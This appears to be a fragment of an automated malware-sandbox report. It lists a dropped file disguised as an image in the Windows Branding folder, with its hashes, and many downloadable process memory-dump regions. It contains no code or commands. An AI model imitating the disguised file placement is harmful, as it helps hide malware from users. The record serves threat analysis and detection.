dd1196a3067f740be9c8d3cbcfcb7ec511f77daf3ba28929ef8e989597d7a9de5a59e990a7edda5491ef75413967c7db42e6941ec51523428f7fd6a8353f21ba

Download Submit
\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
5b49a655bf1bd6bcb3551bb1cba2a97b

SHA1
a32f1358093e7e3d8ab6abcc286fc2d92a501f78

SHA256
40bbfb4ea867dff557fa9f20ef53d2b31708c847d2c4b601a55f9eabe69c57ca

SHA512
7de6b4bbc1bce7c12a6e7d730f62a6ca33106d9088a0d06e9beba0f94cd8e5a5fcc3d22ebfdcc62467e417dc85f909daf8094b69cd905dfff17fe0981ef7858a

Download Submit
memory/1152-115-0x000007FEEC980000-0x000007FEED31D000-memory.dmp

Filesize
9.6MB

Download
memory/1152-114-0x00000000011B0000-0x0000000001230000-memory.dmp

Filesize
512KB

Download
memory/1152-116-0x00000000011B0000-0x0000000001230000-memory.dmp

Filesize
512KB

Download
memory/1152-117-0x00000000011B0000-0x0000000001230000-memory.dmp

Filesize
512KB

Download
memory/1152-119-0x000007FEEC980000-0x000007FEED31D000-memory.dmp

Filesize
9.6MB

Download
memory/1152-118-0x00000000011B0000-0x0000000001230000-memory.dmp

Filesize
512KB

Download
memory/1152-113-0x000007FEEC980000-0x000007FEED31D000-memory.dmp

Filesize
9.6MB

Download
memory/1740-3-0x00000000413A0000-0x0000000041420000-memory.dmp

Filesize
512KB

Download
memory/1740-59-0x00000000413A0000-0x0000000041420000-memory.dmp

Filesize
512KB

Download
memory/1740-4-0x00000000413A0000-0x0000000041420000-memory.dmp

Filesize
512KB

Download
memory/1740-65-0x00000000413A0000-0x0000000041420000-memory.dmp

Filesize
512KB

Download
memory/1740-1-0x000007FEF4CC0000-0x000007FEF56AC000-memory.dmp

Filesize
9.9MB

Download
memory/1740-2-0x00000000413A0000-0x0000000041420000-memory.dmp

Filesize
512KB

Download
memory/1740-45-0x000007FEF4CC0000-0x000007FEF56AC000-memory.dmp

Filesize
9.9MB

Download
memory/1740-0-0x0000000041940000-0x0000000041D66000-memory.dmp

Filesize
4.1MB

Download
memory/2296-81-0x000007FEEC980000-0x000007FEED31D000-memory.dmp

Filesize
9.6MB

Download
memory/2296-80-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2296-75-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2296-76-0x000007FEEC980000-0x000007FEED31D000-memory.dmp

Filesize
9.6MB

Download
memory/2296-74-0x000007FEEC980000-0x000007FEED31D000-memory.dmp

Filesize
9.6MB

Download
memory/2296-77-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2296-78-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2296-79-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2304-51-0x00000000027C0000-0x0000000002840000-memory.dmp

Filesize
512KB

Download
memory/2304-47-0x00000000027C0000-0x0000000002840000-memory.dmp

Filesize
512KB

Download
memory/2304-53-0x000007FEEC980000-0x000007FEED31D000-memory.dmp

Filesize
9.6MB

Download
memory/2304-48-0x000007FEEC980000-0x000007FEED31D000-memory.dmp

Filesize
9.6MB

Download
memory/2304-52-0x00000000027C0000-0x0000000002840000-memory.dmp

Filesize
512KB

Download
memory/2304-46-0x000007FEEC980000-0x000007FEED31D000-memory.dmp

Filesize
9.6MB

Download
memory/2304-50-0x00000000027C0000-0x0000000002840000-memory.dmp

Filesize
512KB

Download
memory/2304-49-0x00000000027C0000-0x0000000002840000-memory.dmp

Filesize
512KB

Download
memory/2684-63-0x00000000027A0000-0x0000000002820000-memory.dmp

Filesize
512KB

Download
memory/2684-60-0x000007FEEC980000-0x000007FEED31D000-memory.dmp

Filesize
9.6MB

Download
memory/2684-67-0x00000000027A0000-0x0000000002820000-memory.dmp

Filesize
512KB

Download
memory/2684-66-0x00000000027A0000-0x0000000002820000-memory.dmp

Filesize
512KB

Download
memory/2684-64-0x00000000027A0000-0x0000000002820000-memory.dmp

Filesize
512KB

Download
memory/2684-62-0x000007FEEC980000-0x000007FEED31D000-memory.dmp

Filesize
9.6MB

Download
memory/2684-61-0x00000000027A0000-0x0000000002820000-memory.dmp

Filesize
512KB

Download
memory/2684-68-0x000007FEEC980000-0x000007FEED31D000-memory.dmp

Filesize
9.6MB

Download
memory/2900-86-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2900-37-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2900-83-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2900-84-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2900-85-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2900-39-0x000000001B280000-0x000000001B2B2000-memory.dmp

Filesize
200KB

Download
memory/2900-88-0x000007FEEC980000-0x000007FEED31D000-memory.dmp

Filesize
9.6MB

Download
memory/2900-89-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2900-38-0x000000001B280000-0x000000001B2B2000-memory.dmp

Filesize
200KB

Download
memory/2900-82-0x000007FEEC980000-0x000007FEED31D000-memory.dmp

Filesize
9.6MB

Download
memory/2900-33-0x0000000002870000-0x0000000002878000-memory.dmp

Filesize
32KB

Download
memory/2900-14-0x000007FEEC980000-0x000007FEED31D000-memory.dmp

Filesize
9.6MB

Download
memory/2900-18-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2900-19-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2900-20-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2900-21-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2900-23-0x000007FEEC980000-0x000007FEED31D000-memory.dmp

Filesize
9.6MB

Download
memory/2900-12-0x0000000001FA0000-0x0000000001FA8000-memory.dmp

Filesize
32KB

Download
memory/2900-11-0x000000001B3A0000-0x000000001B682000-memory.dmp

Filesize
2.9MB

Download